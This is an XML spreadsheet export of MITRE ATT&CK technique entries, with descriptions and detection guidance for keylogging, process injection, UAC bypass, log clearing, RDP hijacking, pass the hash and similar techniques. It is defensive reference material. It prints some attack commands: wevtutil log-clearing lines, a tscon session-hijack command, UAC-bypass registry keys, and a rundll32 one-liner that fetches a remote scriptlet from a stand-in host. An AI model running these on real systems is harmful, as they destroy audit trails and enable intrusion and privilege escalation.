* **LD_PRELOAD, LD_LIBRARY_PATH** (Linux), **DYLD_INSERT_LIBRARIES** (Mac OS X) environment variables, or the dlfcn application programming interface (API) can be used to dynamically load a library (shared object) in a process which can be used to intercept API calls from the running process. (Citation: Phrack halfdead 1997)
* **Ptrace system calls** can be used to attach to a running process and modify it in runtime. (Citation: Uninformed Needle)
* **/proc/[pid]/mem** provides access to the memory of the process and can be used to read/write arbitrary data to it. This technique is very rare due to its complexity. (Citation: Uninformed Needle)
* **VDSO hijacking** performs runtime injection on ELF binaries by manipulating code stubs mapped in from the linux-vdso.so shared object. (Citation: VDSO hijack 2009)
Malware commonly utilizes process injection to access system resources through which Persistence and other environment modifications can be made. More sophisticated samples may perform multiple process injections to segment modules and further evade detection, utilizing named pipes or other inter-process communication (IPC) mechanisms as a communication channel.</t>
  </si>
  <si>
    <t>defense-evasion,privilege-escalation</t>
  </si>
  <si>
    <t>Input Capture</t>
  </si>
  <si>
    <t>Windows Registry,Kernel drivers,Process monitoring,API monitoring</t>
  </si>
  <si>
    <t>Keyloggers may take many forms, possibly involving modification to the Registry and installation of a driver, setting a hook, or polling to intercept keystrokes. Commonly used API calls include SetWindowsHook, GetKeyState, and GetAsyncKeyState. (Citation: Adventures of a Keystroke) Monitor the Registry and file system for such changes and detect driver installs, as well as looking for common keylogging API calls. API calls alone are not an indicator of keylogging, but may provide behavioral data that is useful when combined with other information such as new files written to disk and unusual processes.
Monitor the Registry for the addition of a Custom Credential Provider. (Citation: Wrightson 2012) Detection of compromised [Valid Accounts](https://attack.mitre.org/techniques/T1078) in use by adversaries may help to catch the result of user input interception if new techniques are used.</t>
  </si>
  <si>
    <t>Adversaries can use methods of capturing user input for obtaining credentials for [Valid Accounts](https://attack.mitre.org/techniques/T1078) and information Collection that include keylogging and user input field interception.
Keylogging is the most prevalent type of input capture, with many different ways of intercepting keystrokes, (Citation: Adventures of a Keystroke) but other methods exist to target information for specific purposes, such as performing a UAC prompt or wrapping the Windows default credential provider. (Citation: Wrightson 2012)
Keylogging is likely to be used to acquire credentials for new access opportunities when [Credential Dumping](https://attack.mitre.org/techniques/T1003) efforts are not effective, and may require an adversary to remain passive on a system for a period of time before an opportunity arises.
Adversaries may also install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. This variation on input capture may be conducted post-compromise using legitimate administrative access as a backup measure to maintain network access through [External Remote Services](https://attack.mitre.org/techniques/T1133) and [Valid Accounts](https://attack.mitre.org/techniques/T1078) or as part of the initial compromise by exploitation of the externally facing web service. (Citation: Volexity Virtual Private Keylogging)</t>
  </si>
  <si>
    <t>collection,credential-access</t>
  </si>
  <si>
    <t>Process Discovery</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</si>
  <si>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that look like process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</si>
  <si>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Service Registry Permissions Weakness</t>
  </si>
  <si>
    <t>Process command-line parameters,Services,Windows Registry</t>
  </si>
  <si>
    <t>Service changes are reflected in the Registry. Modification to existing services should not occur frequently. If a service binary path or failure parameters are changed to values that are not typical for that service and does not correlate with software updates, then it may be due to malicious activity. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.
Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current service information. (Citation: TechNet Autoruns) Look for changes to services that do not correlate with known software, patch cycles, etc. Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data.
Monitor processes and command-line arguments for actions that could be done to modify services. Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Services may also be changed through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1086), so additional logging may need to be configured to gather the appropriate data.</t>
  </si>
  <si>
    <t>Command-Line Interface</t>
  </si>
  <si>
    <t>Command-line interface activities can be captured through proper logging of process execution with command-line arguments. This information can be useful in gaining additional insight to adversaries' actions through how they use native processes or custom tools.</t>
  </si>
  <si>
    <t>Command-line interfaces provide a way of interacting with computer systems and is a common feature across many types of operating system platforms. (Citation: Wikipedia Command-Line Interface) One example command-line interface on Windows systems is [cmd](https://attack.mitre.org/software/S0106), which can be used to perform a number of tasks including execution of other software. Command-line interfaces can be interacted with locally or remotely via a remote desktop application, reverse shell session, etc. Commands that are executed run with the current permission level of the command-line interface process unless the command includes process invocation that changes permissions context for that execution (e.g. [Scheduled Task](https://attack.mitre.org/techniques/T1053)).
Adversaries may use command-line interfaces to interact with systems and execute other software during the course of an operation.</t>
  </si>
  <si>
    <t>Registry Run Keys / Startup Folder</t>
  </si>
  <si>
    <t>Windows Registry,File monitoring</t>
  </si>
  <si>
    <t>Monitor Registry for changes to run keys that do not correlate with known software, patch cycles, etc. Monitor the start folder for additions or changes. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing the run keys' Registry locations and startup folders. (Citation: TechNet Autoruns) Suspicious program execution as startup programs may show up as outlier processes that have not been seen before when compared against historical data.
Changes to these locations typically happen under normal conditions when legitimate software is installed. To increase confidence of malicious activity, data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.</t>
  </si>
  <si>
    <t>Graphical User Interface</t>
  </si>
  <si>
    <t>The Graphical User Interfaces (GUI) is a common way to interact with an operating system. Adversaries may use a system's GUI during an operation, commonly through a remote interactive session such as [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1076), instead of through a [Command-Line Interface](https://attack.mitre.org/techniques/T1059), to search for information and execute files via mouse double-click events, the Windows Run command (Citation: Wikipedia Run Command), or other potentially difficult to monitor interactions.</t>
  </si>
  <si>
    <t>Hypervisor</t>
  </si>
  <si>
    <t>Type-1 hypervisors may be detected by performing timing analysis. Hypervisors emulate certain CPU instructions that would normally be executed by the hardware. If an instruction takes orders of magnitude longer to execute than normal on a system that should not contain a hypervisor, one may be present. (Citation: virtualization.info 2006)</t>
  </si>
  <si>
    <t>A type-1 hypervisor is a software layer that sits between the guest operating systems and system's hardware. (Citation: Wikipedia Hypervisor) It presents a virtual running environment to an operating system. An example of a common hypervisor is Xen. (Citation: Wikipedia Xen) A type-1 hypervisor operates at a level below the operating system and could be designed with [Rootkit](https://attack.mitre.org/techniques/T1014) functionality to hide its existence from the guest operating system. (Citation: Myers 2007) A malicious hypervisor of this nature could be used to persist on systems through interruption.</t>
  </si>
  <si>
    <t>Security Software Discovery</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</si>
  <si>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</si>
  <si>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Scripting</t>
  </si>
  <si>
    <t>Process monitoring,File monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>Scripting may be common on admin, developer, or power user systems, depending on job function.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
Analyze Office file attachments for potentially malicious macros. Execution of macros may create suspicious process trees depending on what the macro is designed to do. Office processes, such as winword.exe, spawning instances of cmd.exe, script application like wscript.exe or powershell.exe, or other suspicious processes may indicate malicious activity. (Citation: Uperesia Malicious Office Documents)</t>
  </si>
  <si>
    <t>defense-evasion,execution</t>
  </si>
  <si>
    <t>Uncommonly Used Port</t>
  </si>
  <si>
    <t>Adversaries may conduct C2 communications over a non-standard port to bypass proxies and firewalls that have been improperly configured.</t>
  </si>
  <si>
    <t>Indicator Removal from Tools</t>
  </si>
  <si>
    <t>Process use of network,Process monitoring,Process command-line parameters,Anti-virus,Binary file metadata</t>
  </si>
  <si>
    <t>The first detection of a malicious tool may trigger an anti-virus or other security tool alert. Similar events may also occur at the boundary through network IDS, email scanning appliance, etc. The initial detection should be treated as an indication of a potentially more invasive intrusion. The alerting system should be thoroughly investigated beyond that initial alert for activity that was not detected. Adversaries may continue with an operation, assuming that individual events like an anti-virus detect will not be investigated or that an analyst will not be able to conclusively link that event to other activity occurring on the network.</t>
  </si>
  <si>
    <t>If a malicious tool is detected and quarantined or otherwise curtailed, an adversary may be able to determine why the malicious tool was detected (the indicator), modify the tool by removing the indicator, and use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use [Software Packing](https://attack.mitre.org/techniques/T1045) or otherwise modify the file so it has a different signature, and then re-use the malware.</t>
  </si>
  <si>
    <t>Bootkit</t>
  </si>
  <si>
    <t>API monitoring,MBR,VBR</t>
  </si>
  <si>
    <t>Linux,Windows</t>
  </si>
  <si>
    <t>Perform integrity checking on MBR and VBR. Take snapshots of MBR and VBR and compare against known good samples. Report changes to MBR and VBR as they occur for indicators of suspicious activity and further analysis.</t>
  </si>
  <si>
    <t>A bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR). (Citation: MTrends 2016)
Adversaries may use bootkits to persist on systems at a layer below the operating system, which may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.
### Master Boot Record
The MBR is the section of disk that is first loaded after completing hardware initialization by the BIOS. It is the location of the boot loader. An adversary who has raw access to the boot drive may overwrite this area, diverting execution during startup from the normal boot loader to adversary code. (Citation: Lau 2011)
### Volume Boot Record
The MBR passes control of the boot process to the VBR. Similar to the case of MBR, an adversary who has raw access to the boot drive may overwrite the VBR to divert execution during startup to adversary code.</t>
  </si>
  <si>
    <t>Exploitation for Privilege Escalation</t>
  </si>
  <si>
    <t>Windows Error Reporting,Process monitoring,Application logs</t>
  </si>
  <si>
    <t>Detecting software exploitation may be difficult depending on the tools available. Software exploits may not always succeed or may cause the exploited process to become unstable or crash. Also look for behavior on the endpoint system that might indicate successful compromise, such as abnormal behavior of the processes. This could include suspicious files written to disk, evidence of [Process Injection](https://attack.mitre.org/techniques/T1055) for attempts to hide execution or evidence of Discovery.
Higher privileges are often necessary to perform additional actions such as some methods of [Credential Dumping](https://attack.mitre.org/techniques/T1003). Look for additional activity that may indicate an adversary has gained higher privileges.</t>
  </si>
  <si>
    <t>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may be a necessary step for an adversary compromising a endpoint system that has been properly configured and limits other privilege escalation methods.</t>
  </si>
  <si>
    <t>privilege-escalation</t>
  </si>
  <si>
    <t>Permission Groups Discovery</t>
  </si>
  <si>
    <t>Indicator Removal on Host</t>
  </si>
  <si>
    <t>File monitoring,Process monitoring,Process command-line parameters,API monitoring,Windows event logs</t>
  </si>
  <si>
    <t>File system monitoring may be used to detect improper deletion or modification of indicator files. For example, deleting Windows event logs (via native binaries (Citation: Microsoft wevtutil Oct 2017), API functions (Citation: Microsoft EventLog.Clear), or [PowerShell](https://attack.mitre.org/techniques/T1086) (Citation: Microsoft Clear-EventLog)) may generate an alterable event (Event ID 1102: "The audit log was cleared"). Events not stored on the file system may require different detection mechanisms.</t>
  </si>
  <si>
    <t>Adversaries may delete or alter generated artifacts on a host system, including logs and potentially captured files such as quarantined malware. Locations and format of logs will vary, but typical organic system logs are captured as Windows events or Linux/macOS files such as [Bash History](https://attack.mitre.org/techniques/T1139) and /var/log/* .
Actions that interfere with eventing and other notifications that can be used to detect intrusion activity may compromise the integrity of security solutions, causing events to go unreported. They may also make forensic analysis and incident response more difficult due to lack of sufficient data to determine what occurred.
### Clear Windows Event Logs
Windows event logs are a record of a computer's alerts and notifications. Microsoft defines an event as "any significant occurrence in the system or in a program that requires users to be notified or an entry added to a log." There are three system-defined sources of Events: System, Application, and Security.
Adversaries performing actions related to account management, account logon and directory service access, etc. may choose to clear the events in order to hide their activities.
The event logs can be cleared with the following utility commands:
* &lt;code&gt;wevtutil cl system&lt;/code&gt;
* &lt;code&gt;wevtutil cl application&lt;/code&gt;
* &lt;code&gt;wevtutil cl security&lt;/code&gt;
Logs may also be cleared through other mechanisms, such as [PowerShell](https://attack.mitre.org/techniques/T1086).</t>
  </si>
  <si>
    <t>Standard Application Layer Protocol</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</si>
  <si>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for the port that is being used. (Citation: University of Birmingham C2)</t>
  </si>
  <si>
    <t>Adversaries may communicate using a common, standardized application layer protocol such as HTTP, HTTPS, SMTP, or DNS to avoid detection by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are RPC, SSH, or RDP.</t>
  </si>
  <si>
    <t>Third-party Software</t>
  </si>
  <si>
    <t>File monitoring,Third-party application logs,Windows Registry,Process monitoring,Process use of network,Binary file metadata</t>
  </si>
  <si>
    <t>DLL Side-Loading</t>
  </si>
  <si>
    <t>Process use of network,Process monitoring,Loaded DLLs</t>
  </si>
  <si>
    <t>Monitor processes for unusual activity (e.g., a process that does not use the network begins to do so). Track DLL metadata, such as a hash, and compare DLLs that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates.</t>
  </si>
  <si>
    <t>Programs may specify DLLs that are loaded at runtime. Programs that improperly or vaguely specify a required DLL may be open to a vulnerability in which an unintended DLL is loaded. Side-loading vulnerabilities specifically occur when Windows Side-by-Side (WinSxS) manifests (Citation: MSDN Manifests) are not explicit enough about characteristics of the DLL to be loaded. Adversaries may take advantage of a legitimate program that is vulnerable to side-loading to load a malicious DLL. (Citation: Stewart 2014)
Adversaries likely use this technique as a means of masking actions they perform under a legitimate, trusted system or software process.</t>
  </si>
  <si>
    <t>Data Staged</t>
  </si>
  <si>
    <t>Collected data is staged in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Data Compressed](https://attack.mitre.org/techniques/T1002) or [Data Encrypted](https://attack.mitre.org/techniques/T1022).
Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.</t>
  </si>
  <si>
    <t>Pass the Hash</t>
  </si>
  <si>
    <t>Audit all logon and credential use events and review for discrepancies. Unusual remote logins that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity. NTLM LogonType 3 authentications that are not associated to a domain login and are not anonymous logins are suspicious.</t>
  </si>
  <si>
    <t>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In this technique, valid password hashes for the account being used are captured using a Credential Access technique. Captured hashes are used with PtH to authenticate as that user. Once authenticated, PtH may be used to perform actions on local or remote systems. 
Windows 7 and higher with KB2871997 require valid domain user credentials or RID 500 administrator hashes. (Citation: NSA Spotting)</t>
  </si>
  <si>
    <t>Remote Desktop Protocol</t>
  </si>
  <si>
    <t>Authentication logs,Netflow/Enclave netflow,Process monitoring</t>
  </si>
  <si>
    <t>Use of RDP may be legitimate, depending on the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with RDP. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time.
Also, set up process monitoring for &lt;code&gt;tscon.exe&lt;/code&gt; usage and monitor service creation that uses &lt;code&gt;cmd.exe /k&lt;/code&gt; or &lt;code&gt;cmd.exe /c&lt;/code&gt; in its arguments to prevent RDP session hijacking.</t>
  </si>
  <si>
    <t>Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS). (Citation: TechNet Remote Desktop Services) There are other implementations and third-party tools that provide graphical access [Remote Services](https://attack.mitre.org/techniques/T1021) similar to RDS.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Features](https://attack.mitre.org/techniques/T1015) technique for Persistence. (Citation: Alperovitch Malware)
Adversaries may also perform RDP session hijacking which involves stealing a legitimate user's remote session. Typically, a user is notified when someone else is trying to steal their session and prompted with a question. With System permissions and using Terminal Services Console, &lt;code&gt;c:\windows\system32\tscon.exe [session number to be stolen]&lt;/code&gt;, an adversary can hijack a session without the need for credentials or prompts to the user. (Citation: RDP Hijacking Korznikov) This can be done remotely or locally and with active or disconnected sessions. (Citation: RDP Hijacking Medium) It can also lead to [Remote System Discovery](https://attack.mitre.org/techniques/T1018) and Privilege Escalation by stealing a Domain Admin or higher privileged account session. All of this can be done by using native Windows commands, but it has also been added as a feature in RedSnarf. (Citation: Kali Redsnarf)</t>
  </si>
  <si>
    <t>Windows Admin Shares</t>
  </si>
  <si>
    <t>Process use of network,Authentication logs,Process monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>Windows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. Example network shares include &lt;code&gt;C$&lt;/code&gt;, &lt;code&gt;ADMIN$&lt;/code&gt;, and &lt;code&gt;IPC$&lt;/code&gt;. 
Adversaries may use this technique in conjunction with administrator-level [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely access a networked system over server message block (SMB) (Citation: Wikipedia SMB) to interact with systems using remote procedure calls (RPCs), (Citation: TechNet RPC) transfer files, and run transferred binaries through remote Execution. Example execution techniques that rely on authenticated sessions over SMB/RPC are [Scheduled Task](https://attack.mitre.org/techniques/T1053), [Service Execution](https://attack.mitre.org/techniques/T1035), and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). Adversaries can also use NTLM hashes to access administrator shares on systems with [Pass the Hash](https://attack.mitre.org/techniques/T1075) and certain configuration and patch levels. (Citation: Microsoft Admin Shares)
The [Net](https://attack.mitre.org/software/S0039) utility can be used to connect to Windows admin shares on remote systems using &lt;code&gt;net use&lt;/code&gt; commands with valid credentials. (Citation: Technet Net Use)</t>
  </si>
  <si>
    <t>Valid Accounts</t>
  </si>
  <si>
    <t>defense-evasion,persistence,privilege-escalation,initial-access</t>
  </si>
  <si>
    <t>Multilayer Encryption</t>
  </si>
  <si>
    <t>Packet capture,Process use of network,Malware reverse engineering,Process monitoring</t>
  </si>
  <si>
    <t>If malware uses [Standard Cryptographic Protocol](https://attack.mitre.org/techniques/T1032), SSL/TLS inspection can be used to detect command and control traffic within some encrypted communication channels. (Citation: SANS Decrypting SSL) SSL/TLS inspection does come with certain risks that should be considered before implementing to avoid potential security issues such as incomplete certificate validation. (Citation: SEI SSL Inspection Risks) After SSL/TLS inspection, additional cryptographic analysis may be needed to analyze the second layer of encryption.
With [Custom Cryptographic Protocol](https://attack.mitre.org/techniques/T1024), if malware uses encryption with symmetric keys, it may be possible to obtain the algorithm and key from samples and use them to decode network traffic to detect malware communications signatures. (Citation: Fidelis DarkComet)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</si>
  <si>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An adversary performs C2 communications using multiple layers of encryption, typically (but not exclusively) tunneling a custom encryption scheme within a protocol encryption scheme such as HTTPS or SMTPS.</t>
  </si>
  <si>
    <t>Taint Shared Content</t>
  </si>
  <si>
    <t>Processes that write or overwrite many files to a network shared directory may be suspicious. Monitor processes that are executed from removable media for malicious or abnormal activity such as network connections due to Command and Control and possible network Discovery techniques.
Frequently scan shared network directories for malicious files, hidden files, .LNK files, and other file types that may not typical exist in directories used to share specific types of content.</t>
  </si>
  <si>
    <t>Credentials in Files</t>
  </si>
  <si>
    <t>File monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>While detecting adversaries accessing these files may be difficult without knowing they exist in the first place, it may be possible to detect adversary use of credentials they have obtained. Monitor the command-line arguments of executing processes for suspicious words or regular expressions that may indicate searching for a password (for example: password, pwd, login, secure, or credentials). See [Valid Accounts](https://attack.mitre.org/techniques/T1078) for more information.</t>
  </si>
  <si>
    <t>System Information Discovery</t>
  </si>
  <si>
    <t>File and Directory Discovery</t>
  </si>
  <si>
    <t>Windows Management Instrumentation Event Subscription</t>
  </si>
  <si>
    <t>Rundll32</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and arguments of rundll32.exe. Compare recent invocations of rundll32.exe with prior history of known good arguments and loaded DLLs to determine anomalous and potentially adversarial activity. Command arguments used with the rundll32.exe invocation may also be useful in determining the origin and purpose of the DLL being loaded.</t>
  </si>
  <si>
    <t>The rundll32.exe program can be called to execute an arbitrary binary. Adversaries may take advantage of this functionality to proxy execution of code to avoid triggering security tools that may not monitor execution of the rundll32.exe process because of whitelists or false positives from Windows using rundll32.exe for normal operations.
Rundll32.exe can be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions &lt;code&gt;Control_RunDLL&lt;/code&gt; and &lt;code&gt;Control_RunDLLAsUser&lt;/code&gt;. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)
Rundll32 can also been used to execute scripts such as JavaScript. This can be done using a syntax similar to this: &lt;code&gt;rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")"&lt;/code&gt;  This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)</t>
  </si>
  <si>
    <t>PowerShell</t>
  </si>
  <si>
    <t>Account Discovery</t>
  </si>
  <si>
    <t>Bypass User Account Control</t>
  </si>
  <si>
    <t>System calls,Process monitoring,Authentication logs,Process command-line parameters</t>
  </si>
  <si>
    <t>There are many ways to perform UAC bypasses when a user is in the local administrator group on a system, so it may be difficult to target detection on all variations. Efforts should likely be placed on mitigation and collecting enough information on process launches and actions that could be performed before and after a UAC bypass is performed. Monitor process API calls for behavior that may be indicative of [Process Injection](https://attack.mitre.org/techniques/T1055) and unusual loaded DLLs through [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1038), which indicate attempts to gain access to higher privileged processes.
Some UAC bypass methods rely on modifying specific, user-accessible Registry settings. For example:
* The &lt;code&gt;eventvwr.exe&lt;/code&gt; bypass uses the &lt;code&gt;[HKEY_CURRENT_USER]\Software\Classes\mscfile\shell\open\command&lt;/code&gt; Registry key. (Citation: enigma0x3 Fileless UAC Bypass)
* The &lt;code&gt;sdclt.exe&lt;/code&gt; bypass uses the &lt;code&gt;[HKEY_CURRENT_USER]\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe&lt;/code&gt; and &lt;code&gt;[HKEY_CURRENT_USER]\Software\Classes\exefile\shell\runas\command\isolatedCommand&lt;/code&gt; Registry keys. (Citation: enigma0x3 sdclt app paths) (Citation: enigma0x3 sdclt bypass)
Analysts should monitor these Registry settings for unauthorized changes.</t>
  </si>
  <si>
    <t>Windows User Account Control (UAC) allows a program to elevate its privileges to perform a task under administrator-level permissions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 (Citation: TechNet How UAC Works)
If the UAC protection level of a computer is set to anything but the highest level, certain Windows programs are allowed to elevate privileges or execute some elevated COM objects without prompting the user through the UAC notification box. (Citation: TechNet Inside UAC) (Citation: MSDN COM Elevation) An example of this is use of rundll32.exe to load a specifically crafted DLL which loads an auto-elevated COM object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user. (Citation: Davidson Windows) Adversaries can use these techniques to elevate privileges to administrator if the target process is unprotected.
Many methods have been discovered to bypass UAC. The Github readme page for UACMe contains an extensive list of methods (Citation: Github UACMe) that have been discovered and implemented within UACMe, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as:
* &lt;code&gt;eventvwr.exe&lt;/code&gt; can auto-elevate and execute a specified binary or script. (Citation: enigma0x3 Fileless UAC Bypass) (Citation: Fortinet Fareit)
Another bypass is possible through some Lateral Movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on lateral systems and default to high integrity. (Citation: SANS UAC Bypass)</t>
  </si>
  <si>
    <t>Disabling Security Tools</t>
  </si>
  <si>
    <t>API monitoring,File monitoring,Services,Windows Registry,Process command-line parameters,Anti-virus</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments to see if security tools are killed or stop running. Monitor Registry edits for modifications to services and startup programs that correspond to security tools. Lack of log or event file reporting may be suspicious.</t>
  </si>
  <si>
    <t>Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security scanning or event reporting.</t>
  </si>
  <si>
    <t>Connection Proxy</t>
  </si>
  <si>
    <t>Process use of network,Process monitoring,Netflow/Enclave netflow,Packet capture</t>
  </si>
  <si>
    <t>Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Network activities disassociated from user-driven actions from processes that normally require user direction are suspicious.
Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server or between clients that should not or often do not communicate with one another).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</si>
  <si>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Replication Through Removable Media</t>
  </si>
  <si>
    <t>File monitoring,Data loss prevention</t>
  </si>
  <si>
    <t>Monitor file access on removable media. Detect processes that execute from removable media after it is mounted or when initiated by a user. If a remote access tool is used in this manner to move laterally, then additional actions are likely to occur after execution, such as opening network connections for Command and Control and system and network information Discovery.</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</si>
  <si>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t>
  </si>
  <si>
    <t>lateral-movement,initial-access</t>
  </si>
  <si>
    <t>Communication Through Removable Media</t>
  </si>
  <si>
    <t>Monitor file access on removable media. Detect processes that execute when removable media is mounted.</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</si>
  <si>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Media](https://attack.mitre.org/techniques/T1091). Commands and files would be relayed from the disconnected system to the Internet-connected system to which the adversary has direct access.</t>
  </si>
  <si>
    <t>Process Hollowing</t>
  </si>
  <si>
    <t>Process monitoring,API monitoring</t>
  </si>
  <si>
    <t>Monitoring API calls may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. API calls that unmap process memory, such as ZwUnmapViewOfSection or NtUnmapViewOfSection, and those that can be used to modify memory within another process, such as WriteProcessMemory, may be used for this technique. (Citation: Endgame Process Injection July 2017)
Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior.</t>
  </si>
  <si>
    <t>Process hollowing occurs when a process is created in a suspended state then its memory is unmapped and replaced with malicious code. Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), execution of the malicious code is masked under a legitimate process and may evade defenses and detection analysis. (Citation: Leitch Hollowing) (Citation: Endgame Process Injection July 2017)</t>
  </si>
  <si>
    <t>Custom Command and Control Protocol</t>
  </si>
  <si>
    <t>Packet capture,Netflow/Enclave netflow,Process use of network,Process monitoring,Host network interface,Network intrusion detection system,Network protocol analysis</t>
  </si>
  <si>
    <t>Analyze network traffic for ICMP messages or other protocols that contain abnormal data or are not normally seen within or exiting the network.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
Monitor and investigate API calls to functions associated with enabling and/or utilizing alternative communication channels.</t>
  </si>
  <si>
    <t>Adversaries may communicate using a custom command and control protocol instead of encapsulating commands/data in an existing [Standard Application Layer Protocol](https://attack.mitre.org/techniques/T1071). Implementations include mimicking well-known protocols or developing custom protocols (including raw sockets) on top of fundamental protocols provided by TCP/IP/another standard network stack.</t>
  </si>
  <si>
    <t>Standard Non-Application Layer Protocol</t>
  </si>
  <si>
    <t>Host network interface,Netflow/Enclave netflow,Network intrusion detection system,Network protocol analysis,Packet capture,Process use of network</t>
  </si>
  <si>
    <t>Use of a standard non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive. (Citation: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 Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts; (Citation: Microsoft ICMP) however, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications.</t>
  </si>
  <si>
    <t>NTFS File Attributes</t>
  </si>
  <si>
    <t>File monitoring,Kernel drivers,API monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>Forensic techniques exist to identify information stored in NTFS EA. (Citation: Journey into IR ZeroAccess NTFS EA) Monitor calls to the ZwSetEaFile and ZwQueryEaFile Windows API functions as well as binaries used to interact with EA, (Citation: Oddvar Moe ADS1 Jan 2018) (Citation: Oddvar Moe ADS2 Apr 2018) and consider regularly scanning for the presence of modified information. (Citation: SpectorOps Host-Based Jul 2017)
There are many ways to create and interact with ADSs using Windows utilities. Monitor for operations (execution, copies, etc.) with file names that contain colons. This syntax (ex: &lt;code&gt;file.ext:ads[.ext]&lt;/code&gt;) is commonly associated with ADSs. (Citation: Microsoft ADS Mar 2014) (Citation: Oddvar Moe ADS1 Jan 2018) (Citation: Oddvar Moe ADS2 Apr 2018) For a more exhaustive list of utilities that can be used to execute and create ADSs, see https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f.
The Streams tool of Sysinternals can be used to uncover files with ADSs. The &lt;code&gt;dir /r&lt;/code&gt; command can also be used to display ADSs. (Citation: Symantec ADS May 2009) Many PowerShell commands (such as Get-Item, Set-Item, Remove-Item, and Get-ChildItem) can also accept a &lt;code&gt;-stream&lt;/code&gt; parameter to interact with ADSs. (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014)</t>
  </si>
  <si>
    <t>Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. (Citation: SpectorOps Host-Based Jul 2017) Within MFT entries are file attributes, (Citation: Microsoft NTFS File Attributes Aug 2010) such as Extended Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files). (Citation: SpectorOps Host-Based Jul 2017) (Citation: Microsoft File Streams) (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014)
Adversaries may store malicious data or binaries in file attribute metadata instead of directly in files. This may be done to evade some defenses, such as static indicator scanning tools and anti-virus. (Citation: Journey into IR ZeroAccess NTFS EA) (Citation: MalwareBytes ADS July 2015)</t>
  </si>
  <si>
    <t>Pass the Ticket</t>
  </si>
  <si>
    <t>Audit all Kerberos authentication and credential use events and review for discrepancies. Unusual remote authentication events that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity.
Event ID 4769 is generated on the Domain Controller when using a golden ticket after the KRBTGT password has been reset twice, as mentioned in the mitigation section. The status code 0x1F indicates the action has failed due to "Integrity check on decrypted field failed" and indicates misuse by a previously invalidated golden ticket. (Citation: CERT-EU Golden Ticket Protection)</t>
  </si>
  <si>
    <t>Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.
In this technique, valid Kerberos tickets for [Valid Accounts](https://attack.mitre.org/techniques/T1078) are captured by [Credential Dumping](https://attack.mitre.org/techniques/T1003).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 (Citation: ADSecurity AD Kerberos Attacks) (Citation: GentilKiwi Pass the Ticket)
Silver Tickets can be obtained for services that use Kerberos as an authentication mechanism and are used to generate tickets to access that particular resource and the system that hosts the resource (e.g., SharePoint). (Citation: ADSecurity AD Kerberos Attacks)
